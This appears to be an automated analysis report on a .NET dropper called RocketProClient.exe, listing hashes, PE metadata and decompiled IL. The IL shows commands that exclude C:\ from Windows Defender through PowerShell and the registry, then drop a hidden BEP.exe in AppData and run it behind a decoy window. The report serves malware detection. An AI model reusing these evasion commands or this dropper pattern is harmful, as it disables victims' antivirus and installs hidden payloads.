Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | cc913323b3b90722eaf610f08ac59328 |
| Sha1 | aae84fdc6db7849742eefc118eef6bc2e8a939cd |
| Sha256 | 2e8bb24568e3a668f6d6c102471923177a98c82ac081e07984c4b8f8aafdffe8 |
| Sha384 | c713e3929d9580ea7c2a57dccd03fcd7bf97ee46b30d8e000c236c74298c8e705aef56c87755e72f77eed630c1d28d02 |
| Sha512 | b30d6ca7d4b9e0ac46e8d9f5069f6205e0dce7b954f24d1f052d22a0c0a23847664a5a08277e859eb10ef642559cdbaef9d85e355b5bb6cd9a2544cbcbfa7a95 |
| SSDeep | 6144:/1cxbgERFWV2az6l3SyY1Y9Q3bFszXxNJQLJB/:/qRFWVPSY1WQ3bFs/JO |
| TLSH | 704402A472A0D937C9AC0BF9A469871917F2A00B3322D6D4BC4A25DA5FE7F440750FB7 |

PeID

| Name0 | Value |
|---|---|
| Module Name | RocketProClient.exe |
| Full Name | RocketProClient.exe |
| EntryPoint | System.Void RocketProClient.Program::Main() |
| Scope Name | RocketProClient.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | RocketProClient |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 96 |
| Main Method | System.Void RocketProClient.Program::Main() |
| Main IL Instruction Count | 38 |
| Main IL | ldstr C:\ stloc.0 <null> ldstr Add-MpPreference -ExclusionPath " ldloc.0 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void RocketProClient.Program::RunPowerShellCommand(System.String) ldstr reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\\" /t REG_DWORD /d 0 /f call System.Void RocketProClient.Program::RunCmdCommand(System.String) call System.Byte[] RocketProClient.Properties.Resources::get_BEP() stloc.1 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) ldloc.1 <null> call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_0075: call System.Void System.Windows.Forms.Application::EnableVisualStyles() pop <null> leave.s IL_0075: call System.Void System.Windows.Forms.Application::EnableVisualStyles() call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) newobj System.Void RocketProClient.WaitingForRocket::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) ret <null> |

| Name0 | Value |
|---|---|
| PDB Path | C:\Users\steff\source\repos\RocketProClient\RocketProClient\obj\Release\RocketProClient.pdb |

| Name0 | Value | Location |
|---|---|---|
| PDB Path | C:\Users\steff\source\repos\RocketProClient\RocketProClient\obj\Release\RocketProClient.pdb | cc913323b3b90722eaf610f08ac59328 |